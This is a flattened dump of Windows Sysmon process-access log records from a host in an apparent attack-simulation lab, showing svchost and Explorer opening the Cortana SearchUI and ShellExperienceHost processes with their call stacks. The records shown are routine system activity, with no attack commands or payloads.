13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a344|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4754-6000-1705-000000009A01}34084400C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f88c6|C:\Windows\System32\TwinUI.dll+ed067|C:\Windows\System32\TwinUI.dll+f742e|C:\Windows\System32\TwinUI.dll+f73f9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4754-6000-1705-000000009A01}34084400C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f88c6|C:\Windows\System32\TwinUI.dll+ed067|C:\Windows\System32\TwinUI.dll+f742e|C:\Windows\System32\TwinUI.dll+f73f9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+18985|C:\Windows\System32\TwinUI.dll+1a704|C:\Windows\System32\TwinUI.dll+1a608|C:\Windows\System32\TwinUI.dll+1ba5f|C:\Windows\System32\TwinUI.dll+1a02d|C:\Windows\System32\TwinUI.dll+1cef1|C:\Windows\System32\TwinUI.dll+40e510|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0 10341000x800000000000000012952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:33.420{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+18985|C:\Windows\System32\TwinUI.dll+1a76c|C:\Windows\System32\TwinUI.dll+1a5f5|C:\Windows\System32\TwinUI.dll+1ba5f|C:\Windows\System32\TwinUI.dll+1a02d|C:\Windows\System32\TwinUI.dll+1cef1|C:\Windows\System32\TwinUI.dll+40e510|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0 10341000x800000000000000013028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.935{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:39.935{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 